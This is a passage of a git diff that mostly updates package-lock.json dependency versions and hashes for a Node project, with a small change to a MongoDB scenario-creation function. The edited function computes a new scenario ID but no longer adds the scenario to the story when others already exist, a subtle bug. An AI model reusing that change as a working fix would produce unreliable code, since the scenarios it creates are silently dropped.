"https://registry.npmjs.org/fs-extra/-/fs-extra-10.0.0.tgz", + "integrity": "sha512-C5owb14u9eJwizKGdchcDUQeFtlSHHthBk8pbX9Vc1PFZrLombudjDnNns88aYslCyF6IY5SUw3Roz6xShcEIQ==", + "dev": true, + "dependencies": { + "graceful-fs": "^4.2.0", + "jsonfile": "^6.0.1", + "universalify": "^2.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/streamroller/node_modules/jsonfile": { + "version": "6.1.0", + "resolved": "https://registry.npmjs.org/jsonfile/-/jsonfile-6.1.0.tgz", + "integrity": "sha512-5dgndWOriYSm5cnYaJNhalLNDKOqFwyDB/rr1E9ZsGciGvKPs8R2xYGCacuf3z6K1YKDz182fd+fY3cn3pMqXQ==", + "dev": true, + "dependencies": { + "universalify": "^2.0.0" + }, + "optionalDependencies": { + "graceful-fs": "^4.1.6" + } + }, "node_modules/streamroller/node_modules/ms": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", "dev": true }, + "node_modules/streamroller/node_modules/universalify": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/universalify/-/universalify-2.0.0.tgz", + "integrity": "sha512-hAZsKq7Yy11Zu1DE0OzWjw7nnLZmJZYTDZZyEFHZdUhV8FkH5MCfoU1XMaxXovpyW5nq5scPqq0ZDP9Zyl04oQ==", + "dev": true, + "engines": { + "node": ">= 10.0.0" + } + }, "node_modules/string_decoder": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", @@ -7436,9 +7455,9 @@ } }, "node_modules/ua-parser-js": { - "version": "0.7.28", - "resolved": "https://registry.npmjs.org/ua-parser-js/-/ua-parser-js-0.7.28.tgz", - "integrity": "sha512-6Gurc1n//gjp9eQNXjD9O3M/sMwVtN5S8Lv9bvOYBfKfDNiIIhqiyi01vMBO45u4zkDE420w/e0se7Vs+sIg+g==", + "version": "0.7.31", + "resolved": "https://registry.npmjs.org/ua-parser-js/-/ua-parser-js-0.7.31.tgz", + "integrity": "sha512-qLK/Xe9E2uzmYI3qLeOmI0tEOt+TBBQyUIAh4aAgU05FVYzeZrKUdkAZfBNVGRaHVgV0TDkdEngJSw/SyQchkQ==", "dev": true, "funding": [ { @@ -7704,11 +7723,11 @@ "integrity": "sha1-tSQ9jz7BqjXxNkYFvA0QNuMKtp8=" }, "node_modules/ws": { - "version": "7.5.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-7.5.0.tgz", - "integrity": "sha512-6ezXvzOZupqKj4jUqbQ9tXuJNo+BR2gU8fFRk3XCP3e0G6WT414u5ELe6Y0vtp7kmSJ3F7YWObSNr1ESsgi4vw==", + "version": "8.2.3", + "resolved": "https://registry.npmjs.org/ws/-/ws-8.2.3.tgz", + "integrity": "sha512-wBuoj1BDpC6ZQ1B7DWQBYVLphPWkm8i9Y0/3YdHjHKHiohOJ1ws+3OccDWtH+PoC9DZD5WOTrJvNbWvjS6JWaA==", "engines": { - "node": ">=8.3.0" + "node": ">=10.0.0" }, "peerDependencies": { "bufferutil": "^4.0.1", @@ -8290,6 +8309,12 @@ "resolved": "https://registry.npmjs.org/@sindresorhus/is/-/is-4.0.1.tgz", "integrity": "sha512-Qm9hBEBu18wt1PO2flE7LPb30BHMQt1eQgbV76YntdNk73XZGpn3izvGTYxbGgzXKgbCjiia0uxTd3aTNQrY/g==" }, + "@socket.io/base64-arraybuffer": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@socket.io/base64-arraybuffer/-/base64-arraybuffer-1.0.2.tgz", + "integrity": "sha512-dOlCBKnDw4iShaIsH/bxujKTM18+2TOAsYz+KSc11Am38H4q5Xw8Bbz97ZYdrVNM+um3p7w86Bvvmcn9q+5+eQ==", + "dev": true + }, "@szmarczak/http-timer": { "version": "4.0.6", "resolved": "https://registry.npmjs.org/@szmarczak/http-timer/-/http-timer-4.0.6.tgz", @@ -8310,21 +8335,21 @@ } }, "@types/component-emitter": { - "version": "1.2.10", - "resolved": "https://registry.npmjs.org/@types/component-emitter/-/component-emitter-1.2.10.tgz", - "integrity": "sha512-bsjleuRKWmGqajMerkzox19aGbscQX5rmmvvXl3wlIp5gMG1HgkiwPxsN5p070fBDKTNSPgojVbuY1+HWMbFhg==", + "version": "1.2.11", + "resolved": "https://registry.npmjs.org/@types/component-emitter/-/component-emitter-1.2.11.tgz", + "integrity": "sha512-SRXjM+tfsSlA9VuG8hGO2nft2p8zjXCK1VcC6N4NXbBbYbSia9kzCChYQajIjzIqOOOuh5Ock6MmV2oux4jDZQ==", "dev": true }, "@types/cookie": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/@types/cookie/-/cookie-0.4.0.tgz", - "integrity": "sha512-y7mImlc/rNkvCRmg8gC3/lj87S7pTUIJ6QGjwHR9WQJcFs+ZMTOaoPrkdFA/YdbuqVEmEbb5RdhVxMkAcgOnpg==", + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/@types/cookie/-/cookie-0.4.1.tgz", + "integrity": "sha512-XW/Aa8APYr6jSVVA1y/DEIZX0/GMKLEVekNG727R8cs56ahETkRAy/3DR7+fJyh7oUgGwNQaRfXCun0+KbWY7Q==", "dev": true }, "@types/cors": { - "version": "2.8.10", - "resolved": "https://registry.npmjs.org/@types/cors/-/cors-2.8.10.tgz", - "integrity": "sha512-C7srjHiVG3Ey1nR6d511dtDkCEjxuN9W1HWAEjGq8kpcwmNM6JJkpC0xvabM7BXTG2wDq8Eu33iH9aQKa7IvLQ==", + "version": "2.8.12", + "resolved": "https://registry.npmjs.org/@types/cors/-/cors-2.8.12.tgz", + "integrity": "sha512-vt+kDhq/M2ayberEtJcIN/hxXy1Pk+59g2FV/ZQceeaTyCtCucjL2Q7FXlFjtWn4n15KCr1NE2lNNFhp0lEThw==", "dev": true }, "@types/http-cache-semantics": { @@ -8717,12 +8742,6 @@ "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.0.tgz", "integrity": "sha1-ibTRmasr7kneFk6gK4nORi1xt2c=" }, - "base64-arraybuffer": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/base64-arraybuffer/-/base64-arraybuffer-0.1.4.tgz", - "integrity": "sha1-mBjHngWbE1X5fgQooBfIOOkLqBI=", - "dev": true - }, "base64id": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/base64id/-/base64id-2.0.0.tgz", @@ -9093,6 +9112,12 @@ "resolved": "https://registry.npmjs.org/commander/-/commander-2.20.3.tgz", "integrity": "sha512-GpVkmM8vF2vQUkj2LvZmD35JxeJOLCwJ9cUkugyk2nuhbv3+mJvpLYYt+0+USMxE+oj+ey/lJEnhZw75x/OMcQ==" }, + "component-emitter": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/component-emitter/-/component-emitter-1.3.0.tgz", + "integrity": "sha512-Rd3se6QB+sO1TwqZjscQrurpEPIfO0/yYnSin6Q/rD3mOutHvUrCAhJub3r90uNb+SESBuE0QYoB90YdfatsRg==", + "dev": true + }, "concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", @@ -9279,9 +9304,9 @@ } }, "date-format": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/date-format/-/date-format-3.0.0.tgz", - "integrity": "sha512-eyTcpKOcamdhWJXj56DpQMo1ylSQpcGtGKXcU0Tb97+K56/CF5amAqqqNj0+KvA0iw2ynxtHWFsPDSClCxe48w==", + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/date-format/-/date-format-4.0.3.tgz", + "integrity": "sha512-7P3FyqDcfeznLZp2b+OMitV9Sz2lUnsT87WaTat9nVwqsBkTzPG3lPLNwW3en6F4pHUiWzr6vb8CLhjdK9bcxQ==", "dev": true }, "debug": { @@ -9655,24 +9680,27 @@ } }, "engine.io": { - "version": "4.1.1", - "resolved": "https://registry.npmjs.org/engine.io/-/engine.io-4.1.1.tgz", - "integrity": "sha512-t2E9wLlssQjGw0nluF6aYyfX8LwYU8Jj0xct+pAhfWfv/YrBn6TSNtEYsgxHIfaMqfrLx07czcMg9bMN6di+3w==", + "version": "6.1.2", + "resolved": "https://registry.npmjs.org/engine.io/-/engine.io-6.1.2.tgz", + "integrity": "sha512-v/7eGHxPvO2AWsksyx2PUsQvBafuvqs0jJJQ0FdmJG1b9qIvgSbqDRGwNhfk2XHaTTbTXiC4quRE8Q9nRjsrQQ==", "dev": true, "requires": { + "@types/cookie": "^0.4.1", + "@types/cors": "^2.8.12", + "@types/node": ">=10.0.0", "accepts": "~1.3.4", "base64id": "2.0.0", "cookie": "~0.4.1", "cors": "~2.8.5", "debug": "~4.3.1", - "engine.io-parser": "~4.0.0", - "ws": "~7.4.2" + "engine.io-parser": "~5.0.0", + "ws": "~8.2.3" }, "dependencies": { "debug": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.1.tgz", - "integrity": "sha512-doEwdvm4PCeK4K3RQN2ZC2BYUBaxwLARCqZmMjtF8a51J2Rb0xpVloFRnCODwqjpwnAoao4pelN8l3RJdv3gRQ==", + "version": "4.3.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.3.tgz", + "integrity": "sha512-/zxw5+vh1Tfv+4Qn7a5nsbcJKPaSvCDhojn6FEl9vupwK2VCSDtEiEtqr8DFtzYFOdz63LBkxec7DYuc2jon6Q==", "dev": true, "requires": { "ms": "2.1.2" @@ -9683,23 +9711,16 @@ "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", "dev": true - }, - "ws": { - "version": "7.4.6", - "resolved": "https://registry.npmjs.org/ws/-/ws-7.4.6.tgz", - "integrity": "sha512-YmhHDO4MzaDLB+M9ym/mDA5z0naX8j7SIlT8f8z+I0VtzsRbekxEutHSme7NPS2qE8StCYQNUnfWdXta/Yu85A==", - "dev": true, - "requires": {} } } }, "engine.io-parser": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/engine.io-parser/-/engine.io-parser-4.0.2.tgz", - "integrity": "sha512-sHfEQv6nmtJrq6TKuIz5kyEKH/qSdK56H/A+7DnAuUPWosnIZAS2NHNcPLmyjtY3cGS/MqJdZbUjW97JU72iYg==", + "version": "5.0.3", + "resolved": "https://registry.npmjs.org/engine.io-parser/-/engine.io-parser-5.0.3.tgz", + "integrity": "sha512-BtQxwF27XUNnSafQLvDi0dQ8s3i6VgzSoQMJacpIcGNrlUdfHSKbgm3jmjCVvQluGzqwujQMPAoMai3oYSTurg==", "dev": true, "requires": { - "base64-arraybuffer": "0.1.4" + "@socket.io/base64-arraybuffer": "~1.0.2" } }, "enquirer": { @@ -10455,27 +10476,18 @@ "requires": { "flatted": "^3.1.0", "rimraf": "^3.0.2" - }, - "dependencies": { - "flatted": { - "version": "3.2.2", - "resolved": "https://registry.npmjs.org/flatted/-/flatted-3.2.2.tgz", - "integrity": "sha512-JaTY/wtrcSyvXJl4IMFHPKyFur1sE9AUqc0QnhOaJ0CxHtAoIV8pYDzeEfAaNEtGkOfq4gr3LBFmdXW5mOQFnA==", - "dev": true, - "peer": true - } } }, "flatted": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/flatted/-/flatted-2.0.2.tgz", - "integrity": "sha512-r5wGx7YeOwNWNlCA0wQ86zKyDLMQr+/RB8xy74M4hTphfmjlijTSSXGuH8rnvKZnfT9i+75zmd8jcKdMR4O6jA==", + "version": "3.2.5", + "resolved": "https://registry.npmjs.org/flatted/-/flatted-3.2.5.tgz", + "integrity": "sha512-WIWGi2L3DyTUvUrwRKgGi9TwxQMUEqPOPQBVi71R96jZXJdFskXEmf54BoZaS1kknGODoIGASGEzBUYdyMCBJg==", "dev": true }, "follow-redirects": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.14.1.tgz", - "integrity": "sha512-HWqDgT7ZEkqRzBvc2s64vSZ/hfOceEol3ac/7tKwzuvEyWx3/4UegXh5oBOIotkGsObyk3xznnSRVADBgWSQVg==", + "version": "1.14.9", + "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.14.9.tgz", + "integrity": "sha512-MQDfihBQYMcyy5dhRDJUHcw7lb2Pv/TuE6xP1vyraLukNDHKbDxDNaOE3NbCAdKQApno+GPRyo1YAp89yCjK4w==", "dev": true }, "forever-agent": { @@ -11384,9 +11396,9 @@ "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==" }, "json-schema": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.2.3.tgz", - "integrity": "sha1-tIDIkuWaLwWVTOcnvT8qTogvnhM=" + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", + "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" }, "json-schema-traverse": { "version": "0.4.1", @@ -11424,13 +11436,13 @@ } }, "jsprim": { - "version": "1.4.1", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.1.tgz", - "integrity": "sha1-MT5mvB5cwG5Di8G3SZwuXFastqI=", + "version": "1.4.2", + "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", + "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", "requires": { "assert-plus": "1.0.0", "extsprintf": "1.3.0", - "json-schema": "0.2.3", + "json-schema": "0.4.0", "verror": "1.10.0" } }, @@ -11446,15 +11458,15 @@ } }, "karma": { - "version": "6.3.4", - "resolved": "https://registry.npmjs.org/karma/-/karma-6.3.4.tgz", - "integrity": "sha512-hbhRogUYIulfkBTZT7xoPrCYhRBnBoqbbL4fszWD0ReFGUxU+LYBr3dwKdAluaDQ/ynT9/7C+Lf7pPNW4gSx4Q==", + "version": "6.3.16", + "resolved": "https://registry.npmjs.org/karma/-/karma-6.3.16.tgz", + "integrity": "sha512-nEU50jLvDe5yvXqkEJRf8IuvddUkOY2x5Xc4WXHz6dxINgGDrgD2uqQWeVrJs4hbfNaotn+HQ1LZJ4yOXrL7xQ==", "dev": true, "requires": { "body-parser": "^1.19.0", "braces": "^3.0.2", "chokidar": "^3.5.1", - "colors": "^1.4.0", + "colors": "1.4.0", "connect": "^3.7.0", "di": "^0.0.1", "dom-serialize": "^2.2.1", @@ -11463,16 +11475,17 @@ "http-proxy": "^1.18.1", "isbinaryfile": "^4.0.8", "lodash": "^4.17.21", - "log4js": "^6.3.0", + "log4js": "^6.4.1", "mime": "^2.5.2", "minimatch": "^3.0.4", + "mkdirp": "^0.5.5", "qjobs": "^1.2.0", "range-parser": "^1.2.1", "rimraf": "^3.0.2", - "socket.io": "^3.1.0", + "socket.io": "^4.2.0", "source-map": "^0.6.1", "tmp": "^0.2.1", - "ua-parser-js": "^0.7.28", + "ua-parser-js": "^0.7.30", "yargs": "^16.1.1" }, "dependencies": { @@ -11703,22 +11716,22 @@ "integrity": "sha1-JMS/zWsvuji/0FlNsRedjptlZWE=" }, "log4js": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/log4js/-/log4js-6.3.0.tgz", - "integrity": "sha512-Mc8jNuSFImQUIateBFwdOQcmC6Q5maU0VVvdC2R6XMb66/VnT+7WS4D/0EeNMZu1YODmJe5NIn2XftCzEocUgw==", + "version": "6.4.1", + "resolved": "https://registry.npmjs.org/log4js/-/log4js-6.4.1.tgz", + "integrity": "sha512-iUiYnXqAmNKiIZ1XSAitQ4TmNs8CdZYTAWINARF3LjnsLN8tY5m0vRwd6uuWj/yNY0YHxeZodnbmxKFUOM2rMg==", "dev": true, "requires": { - "date-format": "^3.0.0", - "debug": "^4.1.1", - "flatted": "^2.0.1", - "rfdc": "^1.1.4", - "streamroller": "^2.2.4" + "date-format": "^4.0.3", + "debug": "^4.3.3", + "flatted": "^3.2.4", + "rfdc": "^1.3.0", + "streamroller": "^3.0.2" }, "dependencies": { "debug": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.1.tgz", - "integrity": "sha512-doEwdvm4PCeK4K3RQN2ZC2BYUBaxwLARCqZmMjtF8a51J2Rb0xpVloFRnCODwqjpwnAoao4pelN8l3RJdv3gRQ==", + "version": "4.3.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.3.tgz", + "integrity": "sha512-/zxw5+vh1Tfv+4Qn7a5nsbcJKPaSvCDhojn6FEl9vupwK2VCSDtEiEtqr8DFtzYFOdz63LBkxec7DYuc2jon6Q==", "dev": true, "requires": { "ms": "2.1.2" @@ -12044,6 +12057,15 @@ "yallist": "^4.0.0" } }, + "mkdirp": { + "version": "0.5.5", + "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.5.tgz", + "integrity": "sha512-NKmAlESf6jMGym1++R0Ra7wvhV+wFW63FaSOFPwRahvea0gMUcGUhVeAg/0BC0wiv9ih5NYPB1Wn1UEI1/L+xQ==", + "dev": true, + "requires": { + "minimist": "^1.2.5" + } + }, "mongodb": { "version": "3.7.2", "resolved": "https://registry.npmjs.org/mongodb/-/mongodb-3.7.2.tgz", @@ -12105,9 +12127,9 @@ "integrity": "sha512-M2ufzIiINKCuDfBSAUr1vWQ+vuVcA9kqx8JJUsbQi6yf1uGRyb7HfpdfUr5qLXf3B/t8dPvcjhKMmlfnP47EzQ==" }, "nanoid": { - "version": "3.1.30", - "resolved": "https://registry.npmjs.org/nanoid/-/nanoid-3.1.30.tgz", - "integrity": "sha512-zJpuPDwOv8D2zq2WRoMe1HsfZthVewpel9CAvTfc/2mBD1uUT/agc5f7GHGWXlYkFvi1mVxe4IjvP2HNrop7nQ==", + "version": "3.3.1", + "resolved": "https://registry.npmjs.org/nanoid/-/nanoid-3.3.1.tgz", + "integrity": "sha512-n6Vs/3KGyxPQd6uO0eH4Bv0ojGSUvuLlIHtC3Y0kEO23YRge8H9x1GCzLn28YX0H66pMkxuaeESFq4tKISKwdw==", "dev": true }, "natural-compare": { @@ -12157,9 +12179,9 @@ } }, "node-fetch": { - "version": "2.6.5", - "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.6.5.tgz", - "integrity": "sha512-mmlIVHJEu5rnIxgEgez6b9GgWXbkZj5YZ7fx+2r94a2E+Uirsp6HsPTPlomfdHtpt/B0cdKviwkoaM6pyvUOpQ==", + "version": "2.6.7", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.6.7.tgz", + "integrity": "sha512-ZjMPFEfVx5j+y2yF35Kzx5sF7kDzxuDj6ziH4FFbOp87zKDZNx8yExJIb05OGF4Nlt9IHFIMBkRl41VdvcNdbQ==", "requires": { "whatwg-url": "^5.0.0" } @@ -13058,26 +13080,23 @@ "integrity": "sha1-tf3AjxKH6hF4Yo5BXiUTK3NkbG0=" }, "socket.io": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/socket.io/-/socket.io-3.1.2.tgz", - "integrity": "sha512-JubKZnTQ4Z8G4IZWtaAZSiRP3I/inpy8c/Bsx2jrwGrTbKeVU5xd6qkKMHpChYeM3dWZSO0QACiGK+obhBNwYw==", + "version": "4.4.1", + "resolved": "https://registry.npmjs.org/socket.io/-/socket.io-4.4.1.tgz", + "integrity": "sha512-s04vrBswdQBUmuWJuuNTmXUVJhP0cVky8bBDhdkf8y0Ptsu7fKU2LuLbts9g+pdmAdyMMn8F/9Mf1/wbtUN0fg==", "dev": true, "requires": { - "@types/cookie": "^0.4.0", - "@types/cors": "^2.8.8", - "@types/node": ">=10.0.0", "accepts": "~1.3.4", "base64id": "~2.0.0", - "debug": "~4.3.1", - "engine.io": "~4.1.0", - "socket.io-adapter": "~2.1.0", - "socket.io-parser": "~4.0.3" + "debug": "~4.3.2", + "engine.io": "~6.1.0", + "socket.io-adapter": "~2.3.3", + "socket.io-parser": "~4.0.4" }, "dependencies": { "debug": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.1.tgz", - "integrity": "sha512-doEwdvm4PCeK4K3RQN2ZC2BYUBaxwLARCqZmMjtF8a51J2Rb0xpVloFRnCODwqjpwnAoao4pelN8l3RJdv3gRQ==", + "version": "4.3.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.3.tgz", + "integrity": "sha512-/zxw5+vh1Tfv+4Qn7a5nsbcJKPaSvCDhojn6FEl9vupwK2VCSDtEiEtqr8DFtzYFOdz63LBkxec7DYuc2jon6Q==", "dev": true, "requires": { "ms": "2.1.2" @@ -13092,9 +13111,9 @@ } }, "socket.io-adapter": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/socket.io-adapter/-/socket.io-adapter-2.1.0.tgz", - "integrity": "sha512-+vDov/aTsLjViYTwS9fPy5pEtTkrbEKsw2M+oVSoFGw6OD1IpvlV1VPhUzNbofCQ8oyMbdYJqDtGdmHQK6TdPg==", + "version": "2.3.3", + "resolved": "https://registry.npmjs.org/socket.io-adapter/-/socket.io-adapter-2.3.3.tgz", + "integrity": "sha512-Qd/iwn3VskrpNO60BeRyCyr8ZWw9CPZyitW4AQwmRZ8zCiyDiL+znRnWX6tDHXnWn1sJrM1+b6Mn6wEDJJ4aYQ==", "dev": true }, "socket.io-parser": { @@ -13108,16 +13127,10 @@ "debug": "~4.3.1" }, "dependencies": { - "component-emitter": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/component-emitter/-/component-emitter-1.3.0.tgz", - "integrity": "sha512-Rd3se6QB+sO1TwqZjscQrurpEPIfO0/yYnSin6Q/rD3mOutHvUrCAhJub3r90uNb+SESBuE0QYoB90YdfatsRg==", - "dev": true - }, "debug": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.1.tgz", - "integrity": "sha512-doEwdvm4PCeK4K3RQN2ZC2BYUBaxwLARCqZmMjtF8a51J2Rb0xpVloFRnCODwqjpwnAoao4pelN8l3RJdv3gRQ==", + "version": "4.3.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.3.tgz", + "integrity": "sha512-/zxw5+vh1Tfv+4Qn7a5nsbcJKPaSvCDhojn6FEl9vupwK2VCSDtEiEtqr8DFtzYFOdz63LBkxec7DYuc2jon6Q==", "dev": true, "requires": { "ms": "2.1.2" @@ -13267,36 +13280,57 @@ } }, "streamroller": { - "version": "2.2.4", - "resolved": "https://registry.npmjs.org/streamroller/-/streamroller-2.2.4.tgz", - "integrity": "sha512-OG79qm3AujAM9ImoqgWEY1xG4HX+Lw+yY6qZj9R1K2mhF5bEmQ849wvrb+4vt4jLMLzwXttJlQbOdPOQVRv7DQ==", + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/streamroller/-/streamroller-3.0.2.tgz", + "integrity": "sha512-ur6y5S5dopOaRXBuRIZ1u6GC5bcEXHRZKgfBjfCglMhmIf+roVCECjvkEYzNQOXIN2/JPnkMPW/8B3CZoKaEPA==", "dev": true, "requires": { - "date-format": "^2.1.0", + "date-format": "^4.0.3", "debug": "^4.1.1", - "fs-extra": "^8.1.0" + "fs-extra": "^10.0.0" }, "dependencies": { - "date-format": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/date-format/-/date-format-2.1.0.tgz", - "integrity": "sha512-bYQuGLeFxhkxNOF3rcMtiZxvCBAquGzZm6oWA1oZ0g2THUzivaRhv8uOhdr19LmoobSOLoIAxeUK2RdbM8IFTA==", - "dev": true - }, "debug": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.1.tgz", - "integrity": "sha512-doEwdvm4PCeK4K3RQN2ZC2BYUBaxwLARCqZmMjtF8a51J2Rb0xpVloFRnCODwqjpwnAoao4pelN8l3RJdv3gRQ==", + "version": "4.3.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.3.tgz", + "integrity": "sha512-/zxw5+vh1Tfv+4Qn7a5nsbcJKPaSvCDhojn6FEl9vupwK2VCSDtEiEtqr8DFtzYFOdz63LBkxec7DYuc2jon6Q==", "dev": true, "requires": { "ms": "2.1.2" } }, + "fs-extra": { + "version": "10.0.0", + "resolved": "https://registry.npmjs.org/fs-extra/-/fs-extra-10.0.0.tgz", + "integrity": "sha512-C5owb14u9eJwizKGdchcDUQeFtlSHHthBk8pbX9Vc1PFZrLombudjDnNns88aYslCyF6IY5SUw3Roz6xShcEIQ==", + "dev": true, + "requires": { + "graceful-fs": "^4.2.0", + "jsonfile": "^6.0.1", + "universalify": "^2.0.0" + } + }, + "jsonfile": { + "version": "6.1.0", + "resolved": "https://registry.npmjs.org/jsonfile/-/jsonfile-6.1.0.tgz", + "integrity": "sha512-5dgndWOriYSm5cnYaJNhalLNDKOqFwyDB/rr1E9ZsGciGvKPs8R2xYGCacuf3z6K1YKDz182fd+fY3cn3pMqXQ==", + "dev": true, + "requires": { + "graceful-fs": "^4.1.6", + "universalify": "^2.0.0" + } + }, "ms": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", "dev": true + }, + "universalify": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/universalify/-/universalify-2.0.0.tgz", + "integrity": "sha512-hAZsKq7Yy11Zu1DE0OzWjw7nnLZmJZYTDZZyEFHZdUhV8FkH5MCfoU1XMaxXovpyW5nq5scPqq0ZDP9Zyl04oQ==", + "dev": true } } }, @@ -13585,9 +13619,9 @@ "dev": true }, "ua-parser-js": { - "version": "0.7.28", - "resolved": "https://registry.npmjs.org/ua-parser-js/-/ua-parser-js-0.7.28.tgz", - "integrity": "sha512-6Gurc1n//gjp9eQNXjD9O3M/sMwVtN5S8Lv9bvOYBfKfDNiIIhqiyi01vMBO45u4zkDE420w/e0se7Vs+sIg+g==", + "version": "0.7.31", + "resolved": "https://registry.npmjs.org/ua-parser-js/-/ua-parser-js-0.7.31.tgz", + "integrity": "sha512-qLK/Xe9E2uzmYI3qLeOmI0tEOt+TBBQyUIAh4aAgU05FVYzeZrKUdkAZfBNVGRaHVgV0TDkdEngJSw/SyQchkQ==", "dev": true }, "uid-safe": { @@ -13796,9 +13830,9 @@ "integrity": "sha1-tSQ9jz7BqjXxNkYFvA0QNuMKtp8=" }, "ws": { - "version": "7.5.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-7.5.0.tgz", - "integrity": "sha512-6ezXvzOZupqKj4jUqbQ9tXuJNo+BR2gU8fFRk3XCP3e0G6WT414u5ELe6Y0vtp7kmSJ3F7YWObSNr1ESsgi4vw==", + "version": "8.2.3", + "resolved": "https://registry.npmjs.org/ws/-/ws-8.2.3.tgz", + "integrity": "sha512-wBuoj1BDpC6ZQ1B7DWQBYVLphPWkm8i9Y0/3YdHjHKHiohOJ1ws+3OccDWtH+PoC9DZD5WOTrJvNbWvjS6JWaA==", "requires": {} }, "xmlhttprequest": { diff --git a/backend/src/database/mongodatabase.js b/backend/src/database/mongodatabase.js index 93f0fc65e..8a875b0d4 100644 --- a/backend/src/database/mongodatabase.js +++ b/backend/src/database/mongodatabase.js @@ -655,12 +655,16 @@ async function createScenario(storyId, storySource) { db = await connectDb(); const collection = await selectStoriesCollection(db); const story = await findStory(storyId, storySource, collection); - const lastScenarioIndex = story.scenarios.length; const tmpScenario = emptyScenario(); if (story.scenarios.length === 0) story.scenarios.push(tmpScenario); else { - tmpScenario.scenario_id = story.scenarios[lastScenarioIndex - 1].scenario_id + 1; - story.scenarios.push(tmpScenario); + let newScenID = 0; + for (const scenario of story.scenarios) { + if (scenario.scenario_id > newScenID) { + newScenID = scenario.scenario_id; + } + } + tmpScenario.scenario_id = newScenID + 1; } await replace(story, collection); return tmpScenario; diff --git a/frontend/package-lock.json b/frontend/package-lock.json index d0283591d..77404e16c 100644 --- a/frontend/package-lock.json +++ b/frontend/package-lock.json @@ -948,18 +948,20 @@ "license": "Apache-2.0" }, "node_modules/@babel/code-frame": { - "version": "7.15.8", - "license": "MIT", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.16.7.tgz", + "integrity": "sha512-iAXqUn8IIeBTNd72xsFlgaXHkMBMt6y4HJp1tIaK465CWLT/fG1aqB7ykr95gHHmlBdGbFeWWfyB4NJJ0nmeIg==", "dependencies": { - "@babel/highlight": "^7.14.5" + "@babel/highlight": "^7.16.7" }, "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/compat-data": { - "version": "7.14.7", - "license": "MIT", + "version": "7.17.0", + "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.17.0.tgz", + "integrity": "sha512-392byTlpGWXMv4FbyWw3sAZ/FrW/DrwqLGXpy0mbyNe9Taqv1mg9yON5/o0cnr8XYCkFTZbC1eV+c+LAROgrng==", "engines": { "node": ">=6.9.0" } @@ -1045,35 +1047,38 @@ } }, "node_modules/@babel/helper-annotate-as-pure": { - "version": "7.15.4", + "version": "7.16.7", + "resolved": 